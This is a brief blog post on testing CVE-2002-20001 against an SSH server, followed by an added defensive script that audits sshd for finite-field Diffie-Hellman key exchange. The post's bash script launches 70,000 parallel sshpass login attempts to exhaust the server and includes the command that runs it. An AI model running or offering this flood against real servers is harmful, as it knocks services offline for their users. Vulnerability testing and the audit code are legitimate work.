ssh Vulnerability DoS test

By | May 30, 2023

This test was created when I worked with the CVE-2002-20001 vulnerability. The vulnerability concerns the diffie-hellman-group-exchange-sha256 key exchange algorithm, which has high computational complexity because it uses long exponents that arguably make certain calculations unnecessarily expensive. To test the issue I created a small bash script, ddosssh.sh, to simulate a DDoS attack on an ssh server using different key exchange algorithms. The script code is:

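#!/bin/bash
# Arguments: $1 = server IP/FQDN, $2 = key exchange algorithm
if [ $# -ne 2 ]; then
        echo "No arguments: server IP/FQDN and kex algorithm"
        exit 1
fi
# Start the connection attempts in the background, one per iteration
for i in {0..70000}
do
        sshpass -p 12345 ssh -o KexAlgorithms="$2" "admin@$1" &
done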

To run the script you need to install sshpass; on CentOS:


yum install sshpass

Then I started ddosssh.sh with diffie-hellman-group-exchange-sha256 key exchange algorithm:


./ddosssh.sh 192.168.2.40 diffie-hellman-group-exchange-sha256

An attempt to log in via ssh to the same server shows me this:


# ssh root@192.168.2.40
ssh_exchange_identification: Connection closed by remote host

However, attempts with other Kex algorithms do not show significant differences; sometimes login was denied as well. However, when I ran the script from different computers, in other words doing a DDoS attack instead of DoS, the ssh server on the target machine always falls into an unusable state.
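
A defender-side counterpart to the test above, as an added example that is not part of the original post: it reads sshd's effective configuration (text in the format printed by `sshd -T`) and flags enabled diffie-hellman-* key exchange algorithms, which covers the diffie-hellman-group-exchange-sha256 algorithm tested here and, going beyond the post, the other finite-field DH groups. The function names and both sample configurations are constructed for illustration.

```bash
#!/bin/bash
# Added example, not from the original post. Input is text in `sshd -T`
# format: one lowercase keyword, a space, then its value.

# Print every enabled key exchange algorithm named diffie-hellman-*.
dhe_kex_enabled() {
    printf '%s\n' "$1" | awk '$1 == "kexalgorithms" {
        n = split($2, alg, ",")
        for (i = 1; i <= n; i++)
            if (alg[i] ~ /^diffie-hellman-/) print alg[i]
    }'
}

# Print the effective MaxStartups value (start:rate:full), if present.
max_startups() {
    printf '%s\n' "$1" | awk '$1 == "maxstartups" { print $2 }'
}

# Report findings; return 1 when any diffie-hellman-* KEX is enabled.
audit_sshd() {
    local cfg="$1"
    local dhe ms
    dhe=$(dhe_kex_enabled "$cfg")
    ms=$(max_startups "$cfg")
    echo "INFO: maxstartups=${ms:-not set}"
    if [ -n "$dhe" ]; then
        echo "WARN: finite-field DH key exchange enabled:"
        printf '%s\n' "$dhe" | sed 's/^/  /'
        return 1
    fi
    echo "OK: no diffie-hellman-* key exchange enabled"
}

# Constructed samples (not captured from a real host).
SAMPLE_WEAK='port 22
maxstartups 10:30:100
kexalgorithms curve25519-sha256,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256'
SAMPLE_HARDENED='port 22
maxstartups 10:30:60
kexalgorithms curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256'

audit_sshd "$SAMPLE_WEAK" || true
audit_sshd "$SAMPLE_HARDENED"
# On a live server: audit_sshd "$(sudo sshd -T)"
```
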
